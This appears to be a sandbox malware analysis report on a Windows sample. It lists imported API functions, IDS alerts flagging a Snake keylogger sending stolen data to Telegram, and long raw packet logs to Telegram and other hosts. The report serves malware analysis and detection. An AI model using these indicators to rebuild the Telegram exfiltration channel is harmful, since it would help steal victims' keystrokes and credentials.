                                                                                                              USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                              ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-12-19T15:28:46.105933+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449736172.217.17.46443TCP
                                                                                                              2024-12-19T15:28:54.921372+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738193.122.6.16880TCP
                                                                                                              2024-12-19T15:29:03.140205+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738193.122.6.16880TCP
                                                                                                              2024-12-19T15:29:05.354142+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449753149.154.167.220443TCP
                                                                                                              2024-12-19T15:29:06.968372+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449761193.122.6.16880TCP
                                                                                                              2024-12-19T15:29:08.983430+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449763149.154.167.220443TCP
                                                                                                              2024-12-19T15:29:12.557136+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449775149.154.167.220443TCP
                                                                                                              2024-12-19T15:29:15.994860+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449783149.154.167.220443TCP
                                                                                                              2024-12-19T15:29:19.388638+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449794149.154.167.220443TCP
                                                                                                              2024-12-19T15:29:22.830321+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449805149.154.167.220443TCP
                                                                                                              2024-12-19T15:29:26.346873+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449812149.154.167.220443TCP
                                                                                                              2024-12-19T15:29:29.893929+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449823149.154.167.220443TCP
                                                                                                              2024-12-19T15:29:34.009806+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449833149.154.167.220443TCP
                                                                                                              2024-12-19T15:29:37.524024+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449842149.154.167.220443TCP
                                                                                                              2024-12-19T15:29:40.967355+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449852149.154.167.220443TCP
                                                                                                              2024-12-19T15:29:44.560481+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449861149.154.167.220443TCP
                                                                                                              2024-12-19T15:29:47.965291+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449871149.154.167.220443TCP
                                                                                                              2024-12-19T15:29:51.449518+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449881149.154.167.220443TCP
                                                                                                              2024-12-19T15:29:54.981785+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449890149.154.167.220443TCP
                                                                                                              2024-12-19T15:29:58.386641+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449899149.154.167.220443TCP
                                                                                                              2024-12-19T15:30:02.640506+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449911149.154.167.220443TCP
                                                                                                              2024-12-19T15:30:09.283629+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449928149.154.167.220443TCP
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 19, 2024 15:28:43.463437080 CET49736443192.168.2.4172.217.17.46
                                                                                                              Dec 19, 2024 15:28:43.463474035 CET44349736172.217.17.46192.168.2.4
                                                                                                              Dec 19, 2024 15:28:43.463675022 CET49736443192.168.2.4172.217.17.46
                                                                                                              Dec 19, 2024 15:28:43.489898920 CET49736443192.168.2.4172.217.17.46
                                                                                                              Dec 19, 2024 15:28:43.489921093 CET44349736172.217.17.46192.168.2.4
                                                                                                              Dec 19, 2024 15:28:45.192254066 CET44349736172.217.17.46192.168.2.4
                                                                                                              Dec 19, 2024 15:28:45.192416906 CET49736443192.168.2.4172.217.17.46
                                                                                                              Dec 19, 2024 15:28:45.193351984 CET44349736172.217.17.46192.168.2.4
                                                                                                              Dec 19, 2024 15:28:45.193408012 CET49736443192.168.2.4172.217.17.46
                                                                                                              Dec 19, 2024 15:28:45.248786926 CET49736443192.168.2.4172.217.17.46
                                                                                                              Dec 19, 2024 15:28:45.248831034 CET44349736172.217.17.46192.168.2.4
                                                                                                              Dec 19, 2024 15:28:45.249219894 CET44349736172.217.17.46192.168.2.4
                                                                                                              Dec 19, 2024 15:28:45.249274015 CET49736443192.168.2.4172.217.17.46
                                                                                                              Dec 19, 2024 15:28:45.259291887 CET49736443192.168.2.4172.217.17.46
                                                                                                              Dec 19, 2024 15:28:45.299437046 CET44349736172.217.17.46192.168.2.4
                                                                                                              Dec 19, 2024 15:28:46.105918884 CET44349736172.217.17.46192.168.2.4
                                                                                                              Dec 19, 2024 15:28:46.105998993 CET49736443192.168.2.4172.217.17.46
                                                                                                              Dec 19, 2024 15:28:46.106005907 CET44349736172.217.17.46192.168.2.4
                                                                                                              Dec 19, 2024 15:28:46.106053114 CET49736443192.168.2.4172.217.17.46
                                                                                                              Dec 19, 2024 15:28:46.107131958 CET49736443192.168.2.4172.217.17.46
                                                                                                              Dec 19, 2024 15:28:46.107155085 CET44349736172.217.17.46192.168.2.4
                                                                                                              Dec 19, 2024 15:28:46.107168913 CET49736443192.168.2.4172.217.17.46
                                                                                                              Dec 19, 2024 15:28:46.107482910 CET49736443192.168.2.4172.217.17.46
                                                                                                              Dec 19, 2024 15:28:46.271025896 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:46.271054983 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:46.271126986 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:46.271395922 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:46.271411896 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:47.977205038 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:47.977287054 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:47.982528925 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:47.982538939 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:47.982954979 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:47.983026028 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:47.993314981 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:48.039341927 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.055335999 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.055459976 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.069309950 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.069384098 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.175196886 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.175277948 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.179153919 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.179203987 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.179225922 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.179269075 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.247142076 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.247217894 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.251178980 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.251260996 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.251269102 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.251307964 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.257347107 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.257410049 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.265585899 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.265642881 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.266732931 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.266774893 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.275347948 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.275422096 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.276819944 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.277028084 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.284706116 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.284775972 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.290450096 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.290499926 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.294451952 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.294508934 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.304095984 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.304234028 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.307405949 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.307461023 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.317852020 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.317934036 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.320967913 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.321032047 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.331788063 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.331844091 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.333673954 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.333720922 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.345447063 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.345499039 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.348474026 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.348526955 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.359086037 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.359147072 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.362185001 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.362227917 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.372612000 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.372685909 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.372694969 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.372735023 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.386457920 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.386531115 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.386537075 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.386579037 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.400007010 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.400072098 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.439383984 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.439460039 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.439466000 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.439506054 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.441307068 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.441369057 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.445732117 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.445782900 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.445786953 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.445831060 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.450126886 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.450180054 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.450185061 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.450228930 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.461097956 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.461131096 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.461158037 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.461165905 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.461185932 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.461241961 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.471405029 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.471487999 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.471493959 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.471538067 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.482336044 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.482393980 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.482400894 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.482443094 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.492485046 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.492539883 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.492547989 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.492588997 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.502410889 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.502470016 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.502494097 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.502552032 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.512821913 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.512913942 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.512918949 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.512964010 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.522361040 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.522423029 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.522428036 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.522469044 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.531696081 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.531763077 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.531768084 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.531825066 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.541418076 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.541465044 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.541471004 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.541508913 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.551048994 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.551098108 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.551103115 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.551140070 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.560548067 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.560620070 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.560626030 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.560664892 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.576034069 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.576082945 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.576087952 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.576132059 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.577372074 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.577416897 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.577534914 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.577600002 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.577604055 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.577641964 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.580410957 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.580459118 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.580462933 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.580486059 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.580507040 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.580534935 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.580575943 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.580589056 CET44349737172.217.17.65192.168.2.4
                                                                                                              Dec 19, 2024 15:28:52.580606937 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:52.580636978 CET49737443192.168.2.4172.217.17.65
                                                                                                              Dec 19, 2024 15:28:53.049220085 CET4973880192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:28:53.169481993 CET8049738193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:28:53.169724941 CET4973880192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:28:53.169971943 CET4973880192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:28:53.289870977 CET8049738193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:28:54.440159082 CET8049738193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:28:54.462771893 CET4973880192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:28:54.582961082 CET8049738193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:28:54.868684053 CET8049738193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:28:54.921371937 CET4973880192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:28:55.599934101 CET49739443192.168.2.4172.67.177.134
                                                                                                              Dec 19, 2024 15:28:55.600047112 CET44349739172.67.177.134192.168.2.4
                                                                                                              Dec 19, 2024 15:28:55.600147009 CET49739443192.168.2.4172.67.177.134
                                                                                                              Dec 19, 2024 15:28:55.603713036 CET49739443192.168.2.4172.67.177.134
                                                                                                              Dec 19, 2024 15:28:55.603749037 CET44349739172.67.177.134192.168.2.4
                                                                                                              Dec 19, 2024 15:28:56.826766968 CET44349739172.67.177.134192.168.2.4
                                                                                                              Dec 19, 2024 15:28:56.826885939 CET49739443192.168.2.4172.67.177.134
                                                                                                              Dec 19, 2024 15:28:56.830596924 CET49739443192.168.2.4172.67.177.134
                                                                                                              Dec 19, 2024 15:28:56.830631018 CET44349739172.67.177.134192.168.2.4
                                                                                                              Dec 19, 2024 15:28:56.830935001 CET44349739172.67.177.134192.168.2.4
                                                                                                              Dec 19, 2024 15:28:56.834863901 CET49739443192.168.2.4172.67.177.134
                                                                                                              Dec 19, 2024 15:28:56.875366926 CET44349739172.67.177.134192.168.2.4
                                                                                                              Dec 19, 2024 15:28:57.276554108 CET44349739172.67.177.134192.168.2.4
                                                                                                              Dec 19, 2024 15:28:57.276617050 CET44349739172.67.177.134192.168.2.4
                                                                                                              Dec 19, 2024 15:28:57.276688099 CET49739443192.168.2.4172.67.177.134
                                                                                                              Dec 19, 2024 15:28:57.282922029 CET49739443192.168.2.4172.67.177.134
                                                                                                              Dec 19, 2024 15:29:02.683444977 CET4973880192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:29:02.803522110 CET8049738193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:29:03.089947939 CET8049738193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:29:03.140204906 CET4973880192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:29:03.233059883 CET49753443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:03.233107090 CET44349753149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:03.233196020 CET49753443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:03.233490944 CET49753443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:03.233517885 CET44349753149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:04.679495096 CET44349753149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:04.679574013 CET49753443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:04.681246042 CET49753443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:04.681278944 CET44349753149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:04.681535006 CET44349753149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:04.683289051 CET49753443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:04.723330975 CET44349753149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:04.723393917 CET49753443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:04.723421097 CET44349753149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:05.353986025 CET44349753149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:05.354181051 CET44349753149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:05.354302883 CET49753443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:05.354531050 CET49753443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:05.517005920 CET4973880192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:29:05.518116951 CET4976180192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:29:05.637551069 CET8049738193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:29:05.637620926 CET4973880192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:29:05.637917042 CET8049761193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:29:05.638010025 CET4976180192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:29:05.638117075 CET4976180192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:29:05.757831097 CET8049761193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:29:06.925045013 CET8049761193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:29:06.926645041 CET49763443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:06.926702976 CET44349763149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:06.926799059 CET49763443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:06.927654028 CET49763443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:06.927676916 CET44349763149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:06.968372107 CET4976180192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:29:08.302198887 CET44349763149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:08.303826094 CET49763443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:08.303853035 CET44349763149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:08.303910017 CET49763443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:08.303917885 CET44349763149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:08.983419895 CET44349763149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:08.983514071 CET44349763149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:08.983575106 CET49763443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:08.984253883 CET49763443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:08.989353895 CET4976980192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:29:09.109146118 CET8049769193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:29:09.109384060 CET4976980192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:29:09.109477997 CET4976980192.168.2.4193.122.6.168
                                                                                                              Dec 19, 2024 15:29:09.229999065 CET8049769193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:29:10.400998116 CET8049769193.122.6.168192.168.2.4
                                                                                                              Dec 19, 2024 15:29:10.402574062 CET49775443192.168.2.4149.154.167.220
                                                                                                              Dec 19, 2024 15:29:10.402617931 CET44349775149.154.167.220192.168.2.4
                                                                                                              Dec 19, 2024 15:29:10.402754068 CET49775443192.168.2.4149.154.167.220
